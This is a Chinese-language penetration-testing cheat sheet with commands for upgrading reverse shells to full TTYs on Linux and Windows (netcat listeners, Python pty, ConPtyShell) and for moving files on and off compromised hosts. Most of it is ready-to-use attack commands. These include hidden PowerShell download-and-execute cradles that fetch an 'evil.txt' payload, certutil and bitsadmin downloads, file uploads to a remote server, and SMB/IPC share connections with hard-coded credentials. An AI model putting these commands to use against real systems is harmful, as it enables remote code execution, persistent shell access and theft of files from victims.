文件传输

反弹 shell 终端升级（Linux）

# 查看当前终端大小（kali）
stty size

# 本地监听 1234 端口，等待反弹 shell
nc -nvlp 1234

# 使用Python生成伪终端（升级shell）
python3 -c 'import pty; pty.spawn("/bin/bash")'

# 挂起当前会话（回到本地终端）
ctrl + z

# 恢复会话并设置终端参数，获得完整TTY
stty raw -echo; fg; export SHELL=/bin/bash; export TERM=screen; stty rows 45 columns 194; reset

反弹 shell 终端升级（Windows）

# Kali端：设置终端参数并监听（rlwrap支持历史命令）
# ConPTYShell 工具帮助信息会有命令提示
# ConPTYShell.exe --help
stty size
stty raw -echo; (stty size; cat) | rlwrap nc -lvnp 1234
# Windows端：运行ConPTYShell，连接到Kali并获取cmd.exe
# download：https://github.com/antonioCoco/ConPtyShell
ConPtyShell.exe 1.1.1.1 1234 48 194 cmd.exe

Windows PowerShell 文件传输

# 下载文件
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.28.128/imag/evil.txt','evil.exe')

# 上传本地 /bin/ls 到目标 Web 服务器
(New-Object System.Net.WebClient).UploadFile('http://127.0.0.1:8000/upload','/bin/ls')

# 下载ConPTYShell.exe到目标并执行
Start-Process powershell "(New-Object System.Net.WebClient).UploadFile('http://192.168.56.152', 'ConPtyShell.exe')"
# 另外一种
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.128/imag/evil.txt'))"

Windows Certutil 命令

#下载文件
certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt test.php

#删除缓存
certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt delete

Windows wget 命令

wget -O "evil.txt" http://192.168.28.128/imag/evil.txt

Windows Bitsadmin 命令

bitsadmin /transfer n http://192.168.28.128/imag/evil.txt d:\test\1.txt

Kali xfreerdp 工具使用

# 共享剪切板、自动缩放等
xfreerdp3 /u:"administrator" /p:'nihao@123' /v:192.168.126.206  /cert:ignore /dynamic-resolution /clipboard /scale:180

创建 SMB 共享服务

# Windows，可能会无法连接
net share public=C:\share /grant:everyone,full

# kali 本地创建 SMB 共享服务
impacket-smbserver share ./ -smb2support -username kali -password kali

#建立远程IPC连接
net use \\192.168.28.128\ipc$ /user:administrator "abc123!"

#复制远程文件到本地主机
copy \\192.168.28.128\c$\2.txt D:\test